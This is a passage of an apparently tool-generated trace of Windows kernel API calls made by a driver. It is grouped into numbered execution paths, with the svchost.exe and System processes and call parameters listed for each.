| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76962c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c16ac10 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003c831cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c16ac10, MemoryDescriptorList_unk_out = 0xffffe0003c16ac10 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003c831cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c831cf0, Irp_unk_out = 0xffffe0003c831cf0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c16ac10 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #20 (length: 8, count: 5, processes: 3)
»
| Information | Value |
|---|---|
| Sequence Length | 8 |
Processes
»
| Process | Count |
|---|---|
| Process 7 (svchost.exe, PID: 888) | 1 |
| Process 2 (System, PID: 4) | 3 |
| Process 12 (svchost.exe, PID: 1052) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #22 (length: 6, count: 2, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 6 |
Processes
»
| Process | Count |
|---|---|
| Process 7 (svchost.exe, PID: 888) | 1 |
| Process 11 (svchost.exe, PID: 324) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #30 (length: 81, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 81 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002fd90570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002fd90528, Handle_out = 0xffffffff800010b0, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff800010b0, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002fd90520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff800010b0, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002fd90520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff800010b0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x48000 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76fd0c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1303b0 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002fd90370, ret_val_unk_out = 0xffffe0003c84acf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1303b0, MemoryDescriptorList_unk_out = 0xffffe0003c1303b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003c84acf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003c84acf0, Irp_unk_out = 0xffffe0003c84acf0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1303b0 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002fd90570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002fd90528, Handle_out = 0xffffffff80000fe8, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000fe8, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002fd90520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000fe8, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002fd90520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000fe8, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47fff |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a769aac, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1303b0 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002fd90370, ret_val_unk_out = 0xffffe0003c84acf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1303b0, MemoryDescriptorList_unk_out = 0xffffe0003c1303b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003c84acf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c84acf0, Irp_unk_out = 0xffffe0003c84acf0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1303b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #29 (length: 1, count: 8, processes: 3)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 6 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 1 |
| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b76bcf0, Irp_unk_out = 0xffffe0003b76bcf0, ret_val_out = 0x103 |
Execution Path #184 (length: 109, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 109 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002fd90570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002fd90528, Handle_out = 0xffffffff80000b84, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000b84, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002fd90520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000b84, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002fd90520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000b84, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ffa |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a763a6c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9bd520 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002fd90370, ret_val_unk_out = 0xffffe0003b7c9cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9bd520, MemoryDescriptorList_unk_out = 0xffffe0003b9bd520 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003b7c9cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b7c9cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9bd520 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002fd90570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002fd90528, Handle_out = 0xffffffff80000bbc, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000bbc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002fd90520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000bbc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002fd90520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000bbc, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ff9 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
